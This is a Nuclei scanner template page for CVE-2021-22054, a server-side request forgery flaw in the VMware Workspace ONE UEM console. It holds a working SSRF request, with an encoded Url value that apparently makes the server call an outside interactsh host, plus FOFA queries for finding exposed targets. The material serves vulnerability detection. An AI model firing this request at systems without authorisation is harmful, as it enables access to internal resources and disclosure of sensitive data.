Skip to content
Nuclei Templates

VMWare Workspace ONE UEM - Server-Side Request Forgery

ID: CVE-2021-22054

Severity: high

Author: h1ei1

Tags: cve2021,cve,vmware,workspace,ssrf

Description

Section titled “Description”

VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.

YAML Source

Section titled “YAML Source”
id: CVE-2021-22054


info:
  name: VMWare Workspace ONE UEM - Server-Side Request Forgery
  author: h1ei1
  severity: high
  description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the necessary patches or updates provided by VMWare to fix the vulnerability.
  reference:
    - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
    - https://www.vmware.com/security/advisories/VMSA-2021-0029.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22054
    - https://github.com/fardeen-ahmed/Bug-bounty-Writeups
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-22054
    cwe-id: CWE-918
    epss-score: 0.7582
    epss-percentile: 0.98174
    cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vmware
    product: workspace_one_uem_console
    fofa-query:
      - banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx"
      - banner="/airwatch/default.aspx" || header="/airwatch/default.aspx"
  tags: cve2021,cve,vmware,workspace,ssrf


http:
  - method: GET
    path:
      - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Interactsh Server"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a49bac16ac67995970f908873b7570df88d2df957cb199acd40dd0e80620f2c60220681fee2efb1cfa705c4a6f8592b77f7c14d485bea9b6c39303627b1356bb34d6:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-22054.yaml"

View on Github